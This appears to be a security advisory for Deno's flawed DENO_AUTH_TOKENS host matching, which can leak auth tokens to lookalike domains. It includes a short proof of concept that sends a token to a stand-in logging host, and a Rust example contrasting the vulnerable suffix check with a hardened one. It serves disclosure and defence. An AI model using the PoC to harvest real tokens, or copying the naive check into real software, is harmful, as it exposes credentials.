JLSEC-2026-104

Source
https://github.com/JuliaLang/SecurityAdvisories.jl/blob/main/advisories/published/2026/JLSEC-2026-104.md
Import Source
https://github.com/JuliaLang/SecurityAdvisories.jl/tree/generated/osv/2026/JLSEC-2026-104.json
JSON Data
https://api.osv.dev/v1/vulns/JLSEC-2026-104
Upstream
  • EUVD-2024-0827
Published
2026-04-14T13:10:46.494Z
Modified
2026-04-14T13:31:34.551843992Z
Severity
  • 4.6 (Medium) CVSS_V3 - CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N
Summary
Deno's improper suffix match testing for DENO_AUTH_TOKENS
Details

Summary

Deno improperly checks whether an import specifier's hostname is equal to, or a subdomain of, a token's hostname, which can cause tokens to be sent to servers they should not be sent to. An auth token intended for example.com may be sent to notexample.com.

Details

authtokens.rs uses a simple endswith check, which matches www.deno.land to a deno.land token as intended, but also matches im-in-ur-servers-attacking-ur-deno.land to deno.land tokens.

PoC

  • Set up a server that logs requests. RequestBin will do. For example, denovulnpoc.example.com.
  • Run DENO_AUTH_TOKENS=a1b2c3d4e5f6@left-truncated.domain deno run https://not-a-left-truncated.domain. For example: DENO_AUTH_TOKENS=a1b2c3d4e5f6@poc.example.com deno run https://denovulnpoc.example.com
  • Observe that the token intended only for the truncated domain (poc.example.com) is sent to the full domain (denovulnpoc.example.com).
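The suffix check described under Details, placed beside a host match that respects label boundaries, as an added Rust example (this is not Deno's authtokens.rs code). The AuthToken type and parse_auth_tokens are helpers assumed for this example; the hostnames are the ones used in the advisory text and PoC.

```rust
/// A DENO_AUTH_TOKENS-style entry: the secret and the host it is meant for.
/// Constructed for this example; not Deno's own type.
pub struct AuthToken {
    pub token: String,
    pub host: String,
}

/// Parse `token@host` entries separated by `;`; malformed entries are skipped.
pub fn parse_auth_tokens(value: &str) -> Vec<AuthToken> {
    value
        .split(';')
        .filter_map(|entry| {
            let (token, host) = entry.trim().rsplit_once('@')?;
            if token.is_empty() || host.is_empty() {
                return None;
            }
            Some(AuthToken { token: token.to_string(), host: host.to_ascii_lowercase() })
        })
        .collect()
}

/// The flawed check described in the advisory: a bare suffix test, so
/// `notexample.com` "matches" a token issued for `example.com`.
pub fn naive_host_matches(import_host: &str, token_host: &str) -> bool {
    import_host.ends_with(token_host)
}

/// Hardened check: the import host must equal the token host or be a
/// subdomain of it, i.e. whatever precedes the suffix must end on a label
/// boundary ("www." before "deno.land" passes, "not" before "example.com" fails).
pub fn strict_host_matches(import_host: &str, token_host: &str) -> bool {
    let import_host = import_host.to_ascii_lowercase();
    let token_host = token_host.to_ascii_lowercase();
    if token_host.is_empty() { return false; }
    if import_host == token_host { return true; }
    match import_host.strip_suffix(&token_host) {
        Some(prefix) => prefix.len() > 1 && prefix.ends_with('.'),
        None => false,
    }
}

/// Select the token to attach to a request for `import_host` using the strict rule.
pub fn token_for_host<'a>(tokens: &'a [AuthToken], import_host: &str) -> Option<&'a str> {
    tokens
        .iter()
        .find(|t| strict_host_matches(import_host, &t.host))
        .map(|t| t.token.as_str())
}
```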

Impact

Anyone who uses DENO_AUTH_TOKENS and imports potentially untrusted code is affected.

Database specific
{
    "sources": [
        {
            "html_url": "https://nvd.nist.gov/vuln/detail/CVE-2024-27932",
            "id": "CVE-2024-27932",
            "modified": "2025-01-03T19:19:52.197Z",
            "published": "2024-03-21T02:52:21.953Z",
            "url": "https://services.nvd.nist.gov/rest/json/cves/2.0?cveId=CVE-2024-27932",
            "imported": "2026-04-14T12:58:55.024Z"
        },
        {
            "html_url": "https://github.com/advisories/GHSA-5frw-4rwq-xhcr",
            "id": "GHSA-5frw-4rwq-xhcr",
            "modified": "2024-03-21T18:25:43Z",
            "published": "2024-03-06T17:03:36Z",
            "url": "https://api.github.com/advisories/GHSA-5frw-4rwq-xhcr",
            "imported": "2026-04-14T12:58:59.425Z"
        },
        {
            "html_url": "https://euvd.enisa.europa.eu/vulnerability/EUVD-2024-0827",
            "id": "EUVD-2024-0827",
            "modified": "2024-08-05T16:59:34Z",
            "published": "2024-03-06T20:45:16Z",
            "url": "https://euvdservices.enisa.europa.eu/api/enisaid?id=EUVD-2024-0827",
            "imported": "2026-04-14T12:58:57.176Z"
        }
    ],
    "license": "CC-BY-4.0"
}
References
Credits

Affected packages

Julia / Deno_jll

Package

Name
Deno_jll
Purl
pkg:julia/Deno_jll?uuid=04572ae6-984a-583e-9378-9577a1c2574d

Affected ranges

Type
SEMVER
Events
Introduced
0 (unknown introduced version; all previous versions are affected)
Fixed
2.0.0+0

Database specific

source
"https://github.com/JuliaLang/SecurityAdvisories.jl/tree/generated/osv/2026/JLSEC-2026-104.json"